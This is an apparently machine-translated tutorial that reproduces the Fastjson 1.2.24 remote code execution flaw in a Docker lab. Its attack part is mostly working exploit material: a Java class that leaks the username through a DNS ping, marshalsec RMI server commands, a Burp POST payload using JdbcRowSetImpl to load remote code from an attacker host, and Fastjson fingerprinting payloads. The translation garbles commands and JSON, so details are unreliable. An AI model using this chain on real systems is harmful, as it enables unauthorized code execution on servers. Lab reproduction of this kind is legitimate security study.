Shulou(Shulou.com)05/31 Report--

This article shows you how to analyze the process of reproducing Fastjson1.2.24 vulnerabilities, which is concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Start the shooting range first.

Docker-compose up-d starts vulhub's fastjson environment first

Port 8090 opened by Docker

Assuming that our target IP is 1.1.1.1, then we access 1.1.1.1VRO 8090

Installation environment (maven and jdk, so skip this step)

Install the jdk environment

Many linux have their own jdk environment, but lack a lot of components, so it is normal to report errors.

Https://www.oracle.com/java/technologies/javase/javase-jdk8-downloads.html chooses the appropriate jdk download according to its own system.

Mkdir / opt/java

Tar zxvf jdk-8u251-linux-x64.tar.gz-C / opt/java

Vim / etc/profile

Increase at the end

Export JAVA_HOME=/opt/java/jdk1.8.0_251

Export JRE_HOME=/opt/java/jdk1.8.0_251

Export CLASSPATH=.:$ {JAVA_HOME} / lib:$ {JRE_HOME} / lib

Export PATH=$ {PATH}: ${JAVA_HOME} / bin:$ {JRE_HOME} / bin

Source / etc/profile

test

Java-version

Install maven (linux as an example)

Wget https://mirrors.bfsu.edu.cn/apache/maven/maven-3/3.6.3/binaries/apache-maven-3.6.3-bin.tar.gz

Mkdir / opt/maven

Tar zxvf apache-maven-3.6.3-bin.tar.gz-C / opt/maven/

Configure environment variables

Vim / etc/profile

Add at the bottom

Export MAVEN_HOME=/opt/maven/apache-maven-3.6.3

Export PATH=$MAVEN_HOME/bin:$PATH

Verify that maven is installed successfully

Mvn-version

Error resolution:

You may encounter a mistake like this.

It shows that there is a problem with your installation of jdk, so you can't do it on Baidu according to the above method.

If this is the case:

It means that your environment variables are not properly configured. Only when I report this error, I found that I can install it directly with apt. It may be that I changed the system to this source, but it was not this system in the previous experiment. My system is ubantu. Can I try it on myself when I install apt?

After the environment is installed, the loophole begins to reappear.

Save the following code and name it dnslog.java

Import java.lang.Runtime

Import java.lang.Process

Public class dnslog {

Static {

Try {

Runtime rt = Runtime.getRuntime ()

String [] commands = {"/ bin/sh", "- c", "ping user.`whoami`.dnslog"}

Process pc = rt.exec (commands)

Pc.waitFor ()

} catch (Exception e) {

/ / do nothing

}

}

}

Executing the following code generates a dnslog.class file

Javac dnslog.java

Use python to start a http service in the current directory, and switch to another if the port is occupied

Python-m SimpleHTTPServer 4567

Using the marshalsec project, start the RMI service, listen on port 9999, and load the remote class dnslog.class

Git clone https://github.com/mbechler/marshalsec.git

Cd marshalsec/

Compile the project

Mvn clean package-DskipTests

If the following figure occurs, it is a jdk environment problem, and the built-in jdk environment is incomplete. Just follow the steps above to install.

The success is that the marshalsec-0.0.3-SNAPSHOT-all.jar file is generated in the target directory.

Execute the command under the current directory to start the RMI service:

The server I built for dnslog.class http service IP is 2.2.2.2 and port is 4567.

Cd target/

Java-cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://2.2.2.2 http://2.2.2.2 4567 Compact TouchFile" 9999

RMI services can be built on the same server as http services of dnslog.class class, or on other servers. Our demo is still on the same station.

Now that the environment is ready, pull out the burp and start:

Construct payload to throw and send in burp

POST / HTTP/1.1

Host: 1.1.1.1:8090

Accept-Encoding: gzip, deflate

Accept: * / *

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 160

{

"b": {

"@ type": "com.sun.rowset.JdbcRowSetImpl"

"dataSourceName": "rmi://2.2.2.2:9999/dnslog"

"autoCommit": true

}

}

After success, it is like this.

RMI:

Http service from Python:

Burp return packet:

The Dnslog platform can see the execution result:

Why do I have to talk about the implementation of the three places? we must be very curious. Wouldn't it be better to just say the results?

Here are the possible errors, the first place to check the operation of rmi, the second place to check the opening of http services, and the third place is the execution result.

If there is something wrong with the final result, go somewhere to find the cause if the result shows that it is abnormal. The first and second places that are most likely to cause problems are port occupancy or firewall blocking. The fact that the Dnslog platform is not displayed indicates that the command was not executed successfully, or it may be a platform problem. Check for yourself.

At the end of the paper, the fastjson fingerprint feature 1 is judged according to the return packet.

Grab a package at will, the submission method is changed to POST, and the curly braces are not closed. The word fastjson appears immediately after the return packet. Of course, this can be shielded, if the shield uses other methods, turn back.

2 using dnslog to hit blindly

Construct the following payload, which is received by dnslog platform.

{"zeo": {"@ type": "java.net.Inet4Address", "val": "dnslog"}}

Payload after version 1.2.67

{"@ type": "java.net.Inet4Address", "val": "dnslog"}

{"@ type": "java.net.Inet6Address", "val": "dnslog"}

Deformity:

{"@ type": "java.net.InetSocketAddress" {"address":, "val": "this is dnslog"}}

"@ type": "java.net.InetSocketAddress" {"address":, "val": "this is dnslog"}

["@ Type": "Java.Net.InetSocketAddress" {"address":, "Val": "Zhi è l beautiful dnslog"}] "@ Type":

"java.net.InetSocketAddress" {"address":, "val": "This is dnslog"}}

The above is how to analyze the process of reproducing Fastjson1.2.24 vulnerabilities. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.